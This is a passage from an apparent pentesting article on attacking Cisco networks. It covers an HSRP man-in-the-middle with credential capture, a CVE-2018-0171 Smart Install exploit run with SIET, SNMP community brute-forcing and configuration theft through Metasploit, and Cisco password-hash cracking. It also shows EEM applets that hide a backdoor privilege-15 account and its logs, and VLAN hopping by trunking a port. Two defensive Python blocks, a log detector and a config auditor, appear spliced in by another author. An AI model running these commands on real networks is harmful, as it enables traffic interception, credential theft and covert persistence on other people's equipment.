After injection we need to create a secondary IP address on our network interface with the value of the virtual IP address in the HSRP domain. You should also specify 24-bit mask. In this way, legitimate traffic will be looped back to us, because the virtual IP address used in the HSRP domain is the default gateway address for hosts.

~$ sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0

We set up the well-known Source NAT (masquerading) to intercept all traffic:

~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

We remove the default route on our machine and write a new one which will go through the former Active router (its address is 10.10.100.100). Even though we have hijacked the active role from the router, it will still be able to route traffic.

~$ sudo route del default
~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Now we are the “man in the middle”. Let’s run net-creds.py:

~$ sudo python2 net-creds.py -i eth0

After running the utility, I will reproduce an attempt to authenticate to the FTP server at 172.16.100.140:

~$ ftp 172.16.100.140
Intercepted FTP-creds (insomnia:betrayal)

As a result, we get the creds for the FTP server: insomnia:betrayal

This is how you can attack the HSRP domain and intercept traffic. Basically, everything is similar to GLBP.

7. Cisco Smart Install Exploitation

Cisco Smart Install is a Cisco technology designed to automate the initial configuration and loading of an operating system image on new Cisco hardware. By default, Cisco Smart Install is active on Cisco hardware and uses TCP port 4786.

In 2018, a critical vulnerability, CVE-2018-0171, was found in this protocol. Its threat level is 9.8 on the CVSS scale.

A specially crafted packet sent to TCP port 4786, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:

  • forcibly reboot the device
  • achieve remote code execution (RCE)
  • steal the configuration of the network equipment.

The SIET (Smart Install Exploitation Tool) was developed to exploit this vulnerability and lets you abuse Cisco Smart Install. In this article I will show how to read a legitimate network hardware configuration file. Configuration exfiltration is valuable for a pentester because it reveals the unique features of the network, which makes life easier and helps find new attack vectors.

The target device will be a “live” Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on real hardware.

The address of the target switch is 10.10.100.10 and Cisco Smart Install (CSI) is active. Launch SIET and start the attack. The -g argument means exfiltration of the configuration from the device, the -i argument sets the IP address of the vulnerable target.

~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
Successful exploitation of a vulnerability

The configuration of switch 10.10.100.10 is saved to the tftp/ folder.

Legitimate config of switch (SW1)

8. Configuration exfiltration and enumeration via SNMP

SNMP (Simple Network Management Protocol) is a protocol that allows you to monitor the status of devices on a computer network: network equipment, IP phones, corporate servers or anything else.

SNMP uses the UDP transport layer protocol with port numbers 161/UDP and 162/UDP. So-called community strings are used to authenticate requests to SNMP agents. These are, shall we say, special passwords for communicating with the SNMP service on a device. Community strings have either RO (read-only) or RW (read-write) permissions.

Actually, SNMP can not only monitor the equipment status but also manage it in full: dump configs, change the configuration, etc. If a pentester can find the value of a community string, he effectively gains access to the equipment. However, it all depends on which string was brute-forced: an RO or an RW community string.

Community strings can be brute-forced with the onesixtyone utility. It takes as input a dictionary for brute-forcing and the IP addresses of the target hosts. The targets will be:

  • 10.10.100.10 — Cisco vIOS Switch
  • 10.10.100.254 — Cisco vIOS Router

~$ onesixtyone -c communitystrings -i targets
Found strings: public & private

We found out which community strings are used on those devices. This opens the way to exploitation.
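On the device side, every guess with a wrong community string leaves a %SNMP-3-AUTHFAIL line in the IOS log, so a dictionary run like this one is easy to spot. The added example below (not part of the original article) groups those failures per source host in a sliding window; the log lines are constructed, and the 10-failures-per-minute threshold is an assumption to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# IOS syslog line written for every request carrying a wrong community string
# (timestamp as produced with "service timestamps log datetime msec").
AUTHFAIL = re.compile(
    r"(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d)(?:\.\d+)?: "
    r"%SNMP-3-AUTHFAIL: Authentication failure for SNMP req from host "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})")

def parse_ts(ts: str, year: int = 2022) -> datetime:
    """IOS omits the year from the timestamp; supply it so window arithmetic works."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_snmp_bruteforce(lines, threshold: int = 10, window_s: int = 60) -> dict:
    """Return {source_ip: peak_count} for hosts producing at least `threshold`
    authentication failures inside any `window_s`-second window.
    A dictionary run such as onesixtyone's fires many of these within seconds;
    an operator mistyping a string produces one or two."""
    recent = defaultdict(deque)
    offenders = {}
    for line in lines:
        m = AUTHFAIL.search(line)
        if not m:
            continue
        src, t = m["src"], parse_ts(m["ts"])
        q = recent[src]
        q.append(t)
        while (t - q[0]).total_seconds() > window_s:  # drop events outside the window
            q.popleft()
        if len(q) >= threshold:
            offenders[src] = max(offenders.get(src, 0), len(q))
    return offenders

# Constructed sample log: 12 failures in 11 seconds from 10.10.100.50 (the
# attacking host's address in this article) and one stray failure from another host.
SAMPLE_LOG = [
    f"Sep 23 10:15:{i:02d}.{i * 77 % 1000:03d}: %SNMP-3-AUTHFAIL: "
    f"Authentication failure for SNMP req from host 10.10.100.50"
    for i in range(1, 13)
] + ["Sep 23 10:20:00.000: %SNMP-3-AUTHFAIL: "
     "Authentication failure for SNMP req from host 10.10.100.20"]

if __name__ == "__main__":
    print(detect_snmp_bruteforce(SAMPLE_LOG))
```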

8.1 cisco_config_tftp

With the Metasploit framework, namely the cisco_config_tftp module, you can pull the device configuration if you know the value of the community string. The string with RW rights is private.

We will need the following:

  • RW community string (COMMUNITY)
  • Attacker’s IP address (LHOST)
  • Target equipment IP address (RHOSTS)
  • the path in which the module outputs the configuration of the device (OUTPUTDIR)

msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit

After starting the module, the host configuration with address 10.10.100.10 (10.10.100.10.txt) will be downloaded to the specified folder.

Part of the contents of the SW1 equipment configuration

8.2 snmp_enum

With this module you can find out information about the target hardware. Everything is exactly the same: specify COMMUNITY (by the way, even a string with RO permissions will do) and the IP address of the target device.

msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
Information about the device received via SNMP

9. Post-exploitation of hacked Cisco equipment

9.1 Bruteforce hashes

When you list the device configuration, it makes sense to try to brute-force the password hashes. Maybe you can brute-force the password hash of the account that has the highest privileges. There are several types of passwords in Cisco IOS which are stored in an encrypted form. The table below will guide you through the hash types, how to brute-force and how long it will take.

Hash table in Cisco IOS

Now let’s proceed to the bruteforce itself. In the output of the show run command you will probably come across these lines.

Accounts and their passwords in encrypted form

I will brute-force the hashes with the John the Ripper utility. First I format the hashes a bit, so that “John” can recognize them inside the file we feed it as input.

Before formatting
After formatting

Let’s start the bruteforce. Use the --wordlist switch to specify the path to the dictionary. “John” will determine the type of the hashes inside the file.

~$ john hashes --wordlist=wordlistforbrute
Cracked user passwords

Creds: anxious:Secret123 lies:P@ssw0rd

Let’s try to access the router 10.10.10.100 as user lies.

Login to the router control panel

9.2 Cisco EEM

Cisco EEM is, shall we say, a “programming language” that can be used to write scripts for Cisco IOS and automate routine tasks. In pentest Cisco EEM will help us to hide the user we created on a hacked device.

But! This method also has its disadvantages:

  • there is a small chance of getting caught in the SYSLOG or SNMP server logs
  • if the network engineer also uses Cisco EEM, he may suspect something wrong

First we need to create the user itself, which will be used to attach to the hardware. Make sure that the username carries the prefix hidden_. This prefix is what we will later filter out with | exclude hidden:

Owned(config)# username hidden_grimoire privilege 15 secret youcantseewhatyouwannasee

9.2.1 Hiding from the output of the show run command

This command is used constantly by network engineers; it outputs the configuration of the device currently in use.

Owned(config)# event manager applet hide_from_showrun
Owned(config-applet)# event cli pattern "show run" sync yes
Owned(config-applet)# action 0.0 cli command "enable"
Owned(config-applet)# action 1.0 cli command "show run | exclude hidden | event | action"
Owned(config-applet)# action 2.0 puts "$_cli_result_showrunapplet"

9.2.2 Hiding from the output of the show ssh command

This command displays the currently active users connected via SSH.

Owned(config)# event manager applet hide_from_showssh
Owned(config-applet)# event cli pattern "show ssh" sync yes
Owned(config-applet)# action 0.0 cli command "enable"
Owned(config-applet)# action 1.0 cli command "show ssh | exclude hidden"
Owned(config-applet)# action 2.0 puts "$_cli_result_showsshapplet"

9.2.3 Hiding from the output of the show users command

Displays the currently active users connected via VTY. These are usually remote Telnet and SSH sessions.

Owned(config)# event manager applet hide_from_showusers
Owned(config-applet)# event cli pattern "show users" sync yes
Owned(config-applet)# action 0.0 cli command "enable"
Owned(config-applet)# action 1.0 cli command "show users | exclude hidden"
Owned(config-applet)# action 2.0 puts "$_cli_result_showusersapplet"

9.2.4 Hiding from the output of the show log command (local Cisco IOS logging)

Owned(config)# event manager applet hide_from_showlog
Owned(config-applet)# event cli pattern "show log" sync yes
Owned(config-applet)# action 0.0 cli command "enable"
Owned(config-applet)# action 1.0 cli command "show log | exclude HA_EM | hidden"
Owned(config-applet)# action 2.0 puts "$_cli_result_showlogapplet"

The EEM applets have a lot of interesting features, I advise you not to limit yourself to these ways.

9.3 Lateral VLAN Segmentation Bypass

If you have access to the switch you are directly connected to, you can bypass VLAN segmentation within the network. Simply switch your port to trunk mode, create virtual interfaces with the IDs of the target VLANs, and configure an IP address on them. You can try to request the address dynamically (DHCP) or configure it statically, depending on the case.

First you need to find out exactly which port you are connected to. This can be done from CDP messages, or by filtering the MAC address table with include.

The CDP announcement from the switch. We are on GigabitEthernet0/2 port

If CDP happens to be disabled, you can instead look up the port by your MAC address.

SW1(config)# show mac address-table | include 0050.0000.0500
Found Gi0/2 port by MAC address

Before switching to trunk mode, we need to list the existing VLANs and find out their identifiers. We will then bind these identifiers to sub-interfaces to access the VLANs. Thus, thanks to the trunk, we can reach any VLAN. By the way, the port we are connected to belongs to VLAN 10.

SW1# show vlan brief
show vlan brief (VLAN 10, 20, 50, 60)

Here we go. Enter interface configuration mode and go into trunk mode.

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

During the switch to trunk mode, connectivity is lost. But I will fix that.

Loss of connectivity at the moment of port mode switching

Create virtual sub-interfaces, tag them with the VLAN IDs, and bring them up.

~$ sudo vconfig add eth0 10
~$ sudo vconfig add eth0 20
~$ sudo vconfig add eth0 50
~$ sudo vconfig add eth0 60
~$ sudo ifconfig eth0.10 up
~$ sudo ifconfig eth0.20 up
~$ sudo ifconfig eth0.50 up
~$ sudo ifconfig eth0.60 up

Now you need to request an address via DHCP. But if in your case this is not possible, you can set the address statically.

~$ sudo dhclient -v eth0.10
~$ sudo dhclient -v eth0.20
~$ sudo dhclient -v eth0.50
~$ sudo dhclient -v eth0.60

Example of configuring a static IP address on an interface (VLAN 10):

~$ sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

To test the connection, I send ICMP requests to the default gateways of VLANs 10, 20, 50 and 60.

Check connectivity

In the end, I bypassed VLAN segmentation and can get into any VLAN network, which unties my hands for the next steps.

9.4 Configuration Enumeration

You can use the show run command to find out which configuration is currently running. This reveals some peculiarities of the infrastructure. Perhaps this information will lead you to an easier “win” during a pentest. For example, you may discover the use of an AAA server, which gives you another attack vector.

Owned(config)# show run

9.4.1 CCAT

CCAT (Cisco Config Analysis Tool) is a special tool designed to analyze Cisco hardware configuration files for security holes. It helps automate the search for security misconfigurations and is useful to pentesters and network administrators alike.

~/ccat$ python3 ccat.py showrunfromsw1.txt
CCAT analyzes the configuration file
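As an added example in the spirit of CCAT (my code, neither the article's nor CCAT's), here is a small checker for the specific issues from sections 7, 8, 9.1 and 9.2: Smart Install left enabled (no `no vstack`), default or unrestricted community strings, weak secret storage types, and EEM applets that hook show commands or accounts following the hidden_ naming pattern. The sample running-config is constructed and its hashes are placeholders.

```python
import re

WEAK_SECRET = {"0": "plaintext", "7": "reversible", "5": "md5crypt"}  # prefer type 8/9

def audit_ios_config(text: str) -> list:
    """Return findings for a running-config; an empty list means nothing fired."""
    f, applet = [], None
    lines = [ln.strip() for ln in text.splitlines()]
    if "no vstack" not in lines:  # section 7: Smart Install client still enabled
        f.append("Smart Install not disabled: add 'no vstack' (CVE-2018-0171)")
    for s in lines:
        m = re.match(r"snmp-server community (\S+)(?: view \S+)? (RO|RW)(?: (\S+))?", s)
        if m:  # section 8: community strings
            name, mode, acl = m.groups()
            if name in ("public", "private"):
                f.append(f"SNMP community '{name}' is a well-known default")
            if mode == "RW":
                f.append(f"SNMP community '{name}' is RW (config can be pulled over TFTP)")
            if not acl:
                f.append(f"SNMP community '{name}' has no access-list")
        m = re.match(r"(?:username (\S+) .*?|enable )(secret|password) (\d) ", s)
        if m:  # section 9.1: how the secret is stored
            user, kind, typ = m.groups()
            who = f"user '{user}'" if user else "enable"
            if typ in WEAK_SECRET:
                f.append(f"{who} {kind} is type {typ} ({WEAK_SECRET[typ]}); use type 8 or 9")
            if user and user.startswith("hidden_"):
                f.append(f"{who} matches the hidden_ naming pattern from section 9.2")
        m = re.match(r"event manager applet (\S+)", s)
        if m:
            applet = m.group(1)
        m = re.match(r'event cli pattern "(show [^"]*)"', s)
        if m and applet:  # section 9.2: applet rewriting the output of a show command
            f.append(f"EEM applet '{applet}' intercepts '{m.group(1)}'")
    return f

# Constructed sample config (hashes are placeholders, not real digests).
SAMPLE_CONFIG = """\
enable secret 5 $1$placeholder$notarealhash
username hidden_grimoire privilege 15 secret 5 $1$placeholder$alsofake
username lies privilege 15 secret 9 $9$placeholder$fakehash
snmp-server community public RO
snmp-server community private RW
snmp-server community s3cr3t-ro RO 10
event manager applet hide_from_showrun
 event cli pattern "show run" sync yes
 action 1.0 cli command "show run | exclude hidden"
"""
```

Running `audit_ios_config(SAMPLE_CONFIG)` yields ten findings; a config with `no vstack`, type 9 secrets, ACL-bound non-default communities and no applets yields none.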

Outro

These are the kinds of nightmares that can arise in networks that use Cisco equipment if they are administered by short-sighted network engineers. I spent a month and a half on this research and was surprised at how many vectors there are when attacking Cisco-based networks. I very much hope that my research will give pentesters new attack vectors, and that network administrators will think about the security of their networks and take action.
